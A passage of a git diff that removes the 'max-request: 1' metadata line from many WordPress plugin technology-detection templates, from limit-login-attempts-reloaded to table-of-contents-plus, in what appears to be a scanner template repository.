--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
